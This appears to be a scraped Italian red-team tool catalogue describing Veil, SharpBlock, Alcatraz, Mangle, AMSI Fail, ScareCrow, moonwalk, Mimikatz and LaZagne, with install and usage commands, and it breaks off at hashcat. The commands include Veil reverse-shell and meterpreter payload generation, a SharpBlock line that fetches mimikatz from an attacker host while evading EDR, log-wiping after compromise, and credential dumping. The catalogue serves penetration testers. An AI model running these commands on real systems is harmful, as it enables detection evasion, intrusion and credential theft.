sudo apt-get -y install git
git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
./config/setup.sh --force --silent

Uso:```bash

List all payloads (–list-payloads) for the tool Ordnance (-t Ordnance)

./Veil.py -t Ordnance --list-payloads

List all encoders (–list-encoders) for the tool Ordnance (-t Ordnance)

./Veil.py -t Ordnance --list-encoders

Generate a reverse tcp payload which connects back to the ip 192.168.1.20 on port 1234

./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234

List all payloads (–list-payloads) for the tool Evasion (-t Evasion)

./Veil.py -t Evasion --list-payloads

Generate shellcode using Evasion, payload number 41, reverse_tcp to 192.168.1.4 on port 8676, output file chris

./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris

root@kitploit:~
Gli autori di Veil hanno scritto un bel [post sul blog](https://www.veil-framework.com/veil-command-line-usage/) che spiega ulteriormente l'uso della riga di comando di ordnance ed evasion.

![image](https://assets.kitploit.com/production/public/readmes/147/81bc6fbd0f46783257bcb6d33b67781336ee9d270182aeff0e5e568f8ac4e613.png)

### [🔙](#tool-list)[SharpBlock](https://github.com/CCob/SharpBlock)

Un metodo per bypassare le DLL di proiezione attiva degli EDR impedendo l'esecuzione del punto di ingresso.

**Caratteristiche:**

- Blocca l'esecuzione del punto di ingresso delle DLL EDR, impedendo l'inserimento di hook EDR.
- Bypass AMSI senza patch, non rilevabile dagli scanner che cercano patch del codice Amsi.dll in fase di esecuzione.
- Processo host che viene sostituito con un PE impiantato che può essere caricato da disco, HTTP o named pipe (Cobalt Strike).
- Il processo impiantato è nascosto per aiutare a eludere gli scanner che cercano processi svuotati.
- Gli argomenti della riga di comando vengono spoofati e impiantati dopo la creazione del processo utilizzando un metodo furtivo di rilevamento EDR.
- Bypass ETW senza patch.
- Blocca l'invocazione di NtProtectVirtualMemory quando il chiamato si trova nell'intervallo dello spazio degli indirizzi di una DLL bloccata.

**Installazione:**

Utilizzare [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/) per compilare il binario SharpBlock.

Aprire il [progetto .sln](https://github.com/CCob/SharpBlock) di SharpBlock, scegliere "Release" e compilare.

**Utilizzo:**```bash
# Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL
SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

# Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL
execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

Bel post del blog di PenTestPartners qui.

image

Immagine tratta da https://youtu.be/0W9wkamknfM

🔙Alcatraz

Alcatraz è un offuscatore binario x64 con GUI in grado di offuscare vari file pe diversi, tra cui:

  • .exe
  • .dll
  • .sys

Alcune funzionalità di offuscamento supportate includono:

  • Offuscamento dei movimenti immediati
  • Appiattimento del flusso di controllo
  • Mutazione ADD
  • Offuscamento del punto d'ingresso
  • Offuscamento LEA

Installazione: (Requisiti)

Installazione: https://vcpkg.io/en/getting-started.html```bash vcpkg.exe install asmjit:x64-windows vcpkg.exe install zydis:x64-windows

root@kitploit:~
**Utilizzo:** 

Utilizzo dell'interfaccia grafica per offuscare un binario:

1. Carica un binario facendo clic su `file` nell'angolo in alto a sinistra.
2. Aggiungi funzioni espandendo l'albero `Functions`. (Puoi cercare inserendo il nome nella barra di ricerca in alto)
3. Premi `compile` (**Nota:** *Offuscare molte funzioni potrebbe richiedere alcuni secondi*)

![image](https://assets.kitploit.com/production/public/readmes/147/98ae60c1a4f287f33bd749166514e95f2ba9cdab72850a77025dd743ca52e32a.png)

*Immagine utilizzata da https://github.com/weak1337/Alcatraz*

### [🔙](#tool-list)[Mangle](https://github.com/optiv/Mangle)

Mangle è uno strumento che manipola aspetti degli eseguibili compilati (.exe o DLL). 

Mangle può rimuovere stringhe basate su noti Indicatori di Compromissione (IoC) e sostituirle con caratteri casuali, modificare il file aumentandone le dimensioni per evitare gli EDR, e può clonare certificati di firma del codice da file legittimi. 

In questo modo, Mangle aiuta i loader a eludere gli scanner su disco e in memoria.

**Installazione:** 

Il primo passo, come sempre, è clonare il repository. Prima di compilare Mangle, è necessario installare le dipendenze. Per installarle, esegui i seguenti comandi:```
go get github.com/Binject/debug/pe

Quindi costruiscilo``` git clone https://github.com/optiv/Mangle cd Mangle go build Mangle.go

root@kitploit:~
**Uso:**```bash
  -C string
        Path to the file containing the certificate you want to clone
  -I string
        Path to the orginal file
  -M    Edit the PE file to strip out Go indicators
  -O string
        The new file name
  -S int
        How many MBs to increase the file by

Le informazioni complete sull'utilizzo possono essere trovate qui.

image

Immagine tratta da https://github.com/optiv/Mangle

🔙AMSI Fail

AMSI.fail è un ottimo sito web che può essere utilizzato per generare frammenti PowerShell offuscati che rompono o disabilitano AMSI per il processo corrente.

I frammenti vengono selezionati casualmente da un piccolo pool di tecniche/variazioni prima di essere offuscati. Ogni frammento viene offuscato al momento dell'esecuzione/richiesta in modo che nessun output generato condivida le stesse firme.

Un bel blog di F-Secure che spiega AMSI qui.

image

Immagine tratta da http://amsi.fail/

🔙ScareCrow

ScareCrow è un framework per la creazione di payload per il side loading (non l'iniezione) in un processo Windows legittimo (bypassando i controlli Application Whitelisting).

Una volta che il caricatore DLL viene caricato in memoria, utilizza una tecnica per rimuovere l'hook dell'EDR dalle DLL di sistema in esecuzione nella memoria del processo.

Quando eseguito, ScareCrow copia i byte delle DLL di sistema memorizzate su disco in C:\Windows\System32\. Queste DLL sono memorizzate su disco "pulite" dagli hook dell'EDR perché vengono utilizzate dal sistema per caricare una copia invariata in un nuovo processo quando viene generato. Poiché gli EDR agganciano solo questi processi in memoria, rimangono inalterati.

Belli blog per conoscere le tecniche utilizzate da ScareCrow:

  • Rilevamento e risposta degli endpoint: come si sono evoluti gli hacker
  • EDR e mimetizzazione: come gli aggressori evitano di essere scoperti

Installazione:

ScareCrow richiede golang 1.16.1 o successivo per compilare i loader.```bash

Clone

git clone https://github.com/optiv/ScareCrow cd ScareCrow

Install dependencies

go get github.com/fatih/color go get github.com/yeka/zip go get github.com/josephspurrier/goversioninfo

Required

openssl osslsigncode mingw-w64

Build

go build ScareCrow.go

root@kitploit:~
**Utilizzo:**```
Usage of ./ScareCrow:
  -I string
        Path to the raw 64-bit shellcode.
  -Loader string
        Sets the type of process that will sideload the malicious payload:
        [*] binary - Generates a binary based payload. (This type does not benefit from any sideloading)
        [*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated.
        [*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.
        [*] excel - Loads into a hidden Excel process using a JScript loader.
        [*] msiexec - Loads into MSIexec process using a JScript loader.
        [*] wscript - Loads into WScript process using a JScript loader. (default "binary")
  -O string
        Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.
  -configfile string
        The path to a json based configuration file to generate custom file attributes. This will not use the default ones.
  -console
        Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.
...

Le informazioni complete sull'utilizzo si trovano qui.

immagine

Immagine tratta da https://github.com/optiv/ScareCrow

🔙moonwalk

moonwalk è un eseguibile singolo binario di 400 KB in grado di cancellare le tue tracce durante il penetration testing di una macchina Unix.

Salva lo stato dei log di sistema prima dello sfruttamento e ripristina quello stato, inclusi i timestamp del filesystem dopo lo sfruttamento, lasciando zero tracce di un fantasma nella shell.

Installazione:```bash curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk

root@kitploit:~
**Utilizzo:**```bash
# Start moonwalk straight after getting a shell on the victim Linux endpoint
curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk
chmod +x moonwalk
moonwalk start

# Once you are finished, clear your traces 
moonwalk finish

image

Immagine tratta da https://github.com/mufeedvh/moonwalk

Accesso alle Credenziali

🔙Mimikatz

Ottimo strumento per ottenere accesso a password hashate e in chiaro su un endpoint vittima. Una volta ottenuto l'accesso privilegiato a un sistema, scarica questo strumento per raccogliere alcune credenziali.

Installazione:

  1. Scarica il file mimikatz_trunk.7z.
  2. Una volta scaricato, il binario mimikatz.exe si trova nella cartella x64.

Utilizzo:```bash .\mimikatz.exe privilege::debug

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/a66e3040f581c95c762704952a34495375ffc7d58ad12074d747869851a40ad6.png)

### [🔙](#tool-list)[LaZagne](https://github.com/AlessandroZ/LaZagne)

Ottimo strumento per estrarre le password memorizzate localmente da browser, database, giochi, email, git, wifi, ecc.

**Installazione: (Binario)** 

È possibile installare il binario standalone da [qui](https://github.com/AlessandroZ/LaZagne/releases/).

**Utilizzo:**```bash
# Launch all modes
.\laZagne.exe all

# Launch only a specific module
.\laZagne.exe browsers

# Launch only a specific software script
.\laZagne.exe browsers -firefox

image

🔙hashcat


Read more

Scarica lo strumento
skanuvaty
Scanner DNS/rete/porte estremamente veloce
  • Metabigor Strumento OSINT senza API
  • Gitrob Scanner di informazioni sensibili su GitHub
  • gowitness Utility di screenshot web tramite Chrome Headless